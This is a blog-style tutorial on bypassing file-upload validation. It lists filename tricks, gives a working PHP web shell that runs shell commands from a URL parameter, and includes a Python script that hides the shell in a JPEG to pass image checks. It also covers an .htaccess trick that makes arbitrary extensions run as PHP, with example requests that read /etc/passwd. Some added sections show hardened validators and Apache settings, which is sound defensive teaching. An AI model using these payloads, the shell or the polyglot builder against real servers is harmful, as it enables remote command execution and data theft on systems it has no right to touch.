Tuesday, 30 May 2017

File Upload Extension Validation Bypass


Content-Type —> change the value in the multipart request using Burp, ZAP etc. The browser fills in the real type of the file; if the server trusts this client-supplied header instead of inspecting the bytes, swapping it is enough:
Content-Type: application/x-php
Content-Type: image/jpeg


Use server-executable extensions that a blacklist may have missed, like file.php5, file.shtml, file.asa, file.cert
Change letters to capitals to beat a case-sensitive check: file.aSp or file.PHp3
Add trailing spaces and/or dots to the filename, e.g. file.asp. , file.asp... , file.asp (trailing space): Windows strips trailing dots and spaces when the file is written, so the saved name is file.asp
Use a semicolon after the forbidden extension and before the permitted one: file.asp;.jpg (IIS 6 or earlier only, which ignores what follows the ";")
Upload a file with 2 extensions —> file.php.jpg (on Apache with AddHandler for .php, a handler attached to any extension in the name applies)
Use a null character —> file.asp%00.jpg (the null byte is missing from the original post because Blogspot strips it; PHP before 5.3.4 passed the name through to the filesystem, which stops at the NUL and saves file.asp)
Create a file with a forbidden extension via NTFS alternate data stream syntax —> file.asp:.jpg or file.asp::$data (Windows/IIS only)
Combination of the above

https://www.owasp.org/index.php/Unrestricted_File_Upload

Here is a list of bypasses:

shell.jpg.php (passes a check that only looks for "jpg" somewhere in the name)
shell.jpg.PhP (obfuscation; defeats a case-sensitive blacklist)
shell.php;.jpg (IIS 6 and earlier ignore what follows the ";")
shell.php%00.jpg (the infamous NULL byte, which truncates the name so the trailing text is dropped; Blogspot strips this string from the original post, so it appears there as "%0delete0")

shell.php.test (Apache mod_mime: "test" is not a known extension, so it is ignored and the .php handler applies)
shell.php.xxxjpg (ends in the letters "jpg", so a substring check passes, but .xxxjpg is not a recognised extension so Apache falls back to .php)
.phtml (a commonly used PHP-parsed extension, often forgotten about)
.php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)
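As an added illustration (not part of the original post), here is a Python model of the checks the names above are aimed at: three flawed validators written the way upload handlers often are, the constructed bypass names run through each, and a stricter allow-list check that rejects all of them. The check functions and the ALLOWED set are my own assumptions about typical handler code, not code from any particular application.

```python
# Constructed test input: the bypass names listed above, with the null byte written
# literally (it travels as %00 in an HTTP request).
BYPASS_NAMES = [
    "shell.jpg.php",      # two extensions
    "shell.jpg.PhP",      # case obfuscation
    "shell.php;.jpg",     # IIS 6 semicolon
    "shell.php\x00.jpg",  # null byte
    "shell.php.test",     # unknown trailing extension
    "shell.php.xxxjpg",   # contains "jpg" but .xxxjpg is not an extension
    "shell.phtml",        # alternate PHP extension
    "shell.php5",         # alternate PHP extension
    "shell.php ",         # trailing space (Windows strips it)
    "shell.php.",         # trailing dot (Windows strips it)
    "shell.asp:.jpg",     # NTFS alternate data stream
    "shell.asp::$data",   # NTFS default stream
]

# --- three flawed checks, written the way upload handlers often are (assumed) ---

def check_contains_jpg(name):
    """Substring check: passes if 'jpg' appears anywhere in the name."""
    return "jpg" in name.lower()

def check_endswith_jpg(name):
    """Suffix check: passes if the name ends in .jpg, even after ';' or a NUL."""
    return name.lower().endswith(".jpg")

def check_blacklist_last_ext(name):
    """Case-sensitive blacklist on the text after the last dot; knows only php/asp."""
    ext = name.rsplit(".", 1)[-1]
    return ext not in ("php", "asp")

# --- allow-list check that rejects every name above ---

ALLOWED = {"jpg", "jpeg", "png", "gif"}

def hardened_check(name):
    """Exactly one extension, from an allow list, and no separator tricks."""
    if any(c in name for c in ";:\x00/\\"):   # IIS ';', NTFS ':', NUL, path characters
        return False
    if name.rstrip(" .") != name:               # Windows drops trailing dots and spaces
        return False
    parts = name.lower().split(".")
    return len(parts) == 2 and parts[0] != "" and parts[1] in ALLOWED

def accepted_by(check):
    """Names from the bypass list that a given check lets through."""
    return [n for n in BYPASS_NAMES if check(n)]

if __name__ == "__main__":
    for check in (check_contains_jpg, check_endswith_jpg,
                  check_blacklist_last_ext, hardened_check):
        print(f"{check.__name__:24s} accepts {accepted_by(check)!r}")
```

Even with the allow-list, store the upload under a server-generated name and serve it from a directory where no script handler applies; the name check only narrows the door, it does not close it.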

Perform further checks once uploaded to make sure it is a REAL image:


$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
if ($imageinfo === false) { die('not an image'); }  // false when the header is not a known image format

getimagesize() reads the file header and returns false if the file is not a known image format, so at this point the extension tricks on their own fail: the uploaded bytes must really parse as an image (other functions, such as checking the returned dimensions, serve the same goal). The only foolproof way through is to upload a real image that passes these checks, with the PHP code hidden inside it, rather than trying to bypass the check itself.

We turn to the trusty JPG file as our example image. A surprising amount of information can be stored in a JPG file alongside the actual image data: EXIF 'meta' data such as the camera model the image was taken with, image descriptions and comments, all editable with programs such as GIMP or even a hex editor. For the purposes of this tutorial I use Exif Pilot. (Edit: My good pal Hooded Robin wrote a nifty EXIF editor and shell builder in Ruby, check it out here.)

Create a small image (avatar size) in MSPaint (white background), open it in Exif Pilot and edit the EXIF data, inserting our PHP code into the 'comment' field. I am using my generic 'tiny shell' code, which lets me pass shell commands to the server on the fly:


code: 
<?if($_GET['r0ng']){echo"<pre>".shell_exec($_GET["r0ng"]);}?>

Now we can upload the JPG file using one of the extension bypasses shown earlier and it will pass the real-image check: getimagesize() only reads the image header, and PHP executes whatever sits between the first <? and ?> it finds, however many bytes of JPEG data come before it (those bytes are simply echoed to the response). Note that the shell uses the short <? open tag, which only works when short_open_tag is enabled; <?php is the safer choice.

To run commands on the server, usage would be:

website.com/shell.jpg.php?r0ng=cat /etc/passwd
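Added example, not from the original post or from Exif Pilot: building the same image/PHP polyglot in Python rather than with a GUI editor. It writes the payload into a JPEG COM (comment) segment instead of an EXIF tag, a simplification I chose because getimagesize() only walks the segment headers and never looks at the comment text, then checks the result with a small header walk modelled on how getimagesize() handles JPEGs. The image carries no scan data, so a real decoder would refuse it; the output file name avatar.jpg is assumed.

```python
import struct

# The tiny shell from the post, as bytes, so it can be embedded verbatim.
PAYLOAD = b'<?if($_GET[\'r0ng\']){echo"<pre>".shell_exec($_GET["r0ng"]);}?>'

def segment(marker, body):
    """One JPEG segment: 0xFF, marker byte, 2-byte big-endian length (counts itself), body."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body

def build_jpeg(width, height, comment):
    """SOI, a COM segment holding the comment, a baseline SOF0 header with the
    dimensions (8-bit precision, one grey component), then EOI. Enough for
    header-based image checks; DQT/DHT/SOS are deliberately omitted (assumption:
    the target only calls getimagesize(), it does not decode the pixels)."""
    sof0 = struct.pack(">BHHB", 8, height, width, 1) + b"\x01\x11\x00"
    return (b"\xff\xd8"
            + segment(0xFE, comment)
            + segment(0xC0, sof0)
            + b"\xff\xd9")

def image_size(data):
    """Header walk in the spirit of PHP's getimagesize() for JPEG: require the
    FF D8 FF signature, skip segments until a SOF marker, return (width, height)
    or None. Comment text is skipped by length and never inspected."""
    if data[:3] != b"\xff\xd8\xff":
        return None
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI reached before any SOF
            return None
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if 0xC0 <= marker <= 0xCF and marker not in (0xC4, 0xC8, 0xCC):  # SOF0..SOF15
            _, h, w = struct.unpack(">BHH", data[pos + 4:pos + 9])
            return (w, h)
        pos += 2 + length
    return None

if __name__ == "__main__":
    img = build_jpeg(48, 32, PAYLOAD)
    with open("avatar.jpg", "wb") as f:       # assumed output name
        f.write(img)
    print("image check returns", image_size(img), "; payload embedded:", PAYLOAD in img)
```

The same header walk shows why the earlier tricks stop working here: a bare shell.jpg.php whose content is PHP text has no FF D8 FF signature and is rejected before any extension logic runs.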

Found an extension that will upload but it is not parsed as PHP...

Upload an .htaccess file which tells Apache to process an arbitrary file extension as PHP. This only works when the upload directory is served by Apache with mod_php and AllowOverride permits FileInfo directives (AddType belongs to that override class). If an .htaccess file already exists in the image upload directory, uploading yours replaces it, provided the upload handler does not reject the name.
Create a .htaccess file containing the following line and upload it (replace .mp3 with whatever extension passed the filter):

AddType application/x-httpd-php .mp3 

Upload your shell as shell.mp3. Then access as: website.com/shell.mp3?r0ng=cat /etc/passwd
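For the defensive side of this step, an added example of my own (not from the post): the attacker's .htaccess next to the server-level configuration that makes it ineffective. It assumes Apache with mod_php and an upload directory of /var/www/html/uploads; FPM deployments need the equivalent in their SetHandler/proxy rules.

```apache
# attacker's .htaccess, as uploaded into the image directory
AddType application/x-httpd-php .mp3

# server configuration (httpd.conf / vhost), which an uploaded .htaccess cannot override
<Directory "/var/www/html/uploads">
    # ignore any .htaccess found in the upload tree
    AllowOverride None
    # nothing under this directory is ever run as PHP (mod_php only)
    php_admin_flag engine off
    # serve everything as a plain static file regardless of extension
    SetHandler default-handler
    Options -ExecCGI -Includes
</Directory>
```

With AllowOverride None the AddType line is never read, and with the PHP engine off and the default handler forced, shell.mp3 (or shell.php) is returned as raw bytes instead of being executed.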



Using file upload together with LFI
http://hackers2devnull.blogspot.com.tr/2013/10/lfi-vulnerability-image-upload-form-you.html